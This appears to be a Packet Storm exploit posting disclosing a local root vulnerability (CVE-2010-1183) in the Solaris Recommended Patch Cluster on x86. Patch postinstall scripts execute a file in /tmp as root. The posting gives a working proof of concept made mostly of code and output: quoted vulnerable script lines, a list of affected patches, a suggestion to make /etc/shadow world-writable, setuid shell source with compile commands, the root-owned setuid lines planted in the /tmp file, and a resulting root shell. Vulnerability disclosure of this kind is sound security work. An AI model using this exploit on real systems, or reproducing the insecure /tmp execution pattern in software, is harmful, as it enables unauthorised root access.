what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Solaris Recommended Patch Cluster 6/19 Local Root

Solaris Recommended Patch Cluster 6/19 Local Root
Posted Jul 8, 2013
Authored by Larry W. Cashdollar

Solaris Recommended Patch Cluster 6/19 suffers from a local root command execution vulnerability on x86.

tags | exploit, x86, local, root
systems | solaris
advisories | CVE-2010-1183
SHA-256 | 532e22bc6ff3e644f7b297fffe8d58e1796dc3a75b7965cd74a76062a5280627

Solaris Recommended Patch Cluster 6/19 Local Root

Change Mirror Download
Solaris Recommended Patch Cluster 6/19 local root on x86

Larry W. Cashdollar
7/3/2013
@_larry0
If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.
Local root:
Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.
./144751-01/SUNWos86r/install/postinstall


782 if [ -s /tmp/disketterc.d/rcs9.sh ]
783 then
784 /sbin/sh /tmp/disketterc.d/rcs9.sh "post"
785 fi

Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?
804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)
805 TMPFILE=/tmp/ncrstmp
806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFIL
E
807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases


./141445-09/SUNWos86r/install/postinstall


656 if [ -s /tmp/disketterc.d/rcs9.sh ]
657 then
658 /sbin/sh /tmp/disketterc.d/rcs9.sh "post"
659 fi


Well, it looks like you've got a few chances to abuse it:


larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \;
./144501-19/SUNWos86r/install/postinstall
./141445-09/SUNWos86r/install/postinstall
./142059-01/SUNWos86r/install/postinstall
./147148-26/SUNWos86r/install/postinstall
./127128-11/SUNWos86r/install/postinstall
./148889-03/SUNWos86r/install/postinstall
./142910-17/SUNWos86r/install/postinstall
./144751-01/SUNWos86r/install/postinstall

Psuedo PoC:
Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.
chmod 666 /etc/shadow would be easy.
PoC:
larry@slowaris:~$ cat setuid.c
#include
#include
int
main (void)
{
char *shell[2];
shell[0] = "sh";
shell[1] = NULL;
setregid (0, 0);
setreuid (0, 0);
execve ("/bin/sh", shell, NULL);
return(0);
}
gcc -o /tmp/r00t setuid.c
larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t
After patches have been applied:
larry@slowaris:~$ /tmp/r00t
# id
uid=0(root) gid=0(root)
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close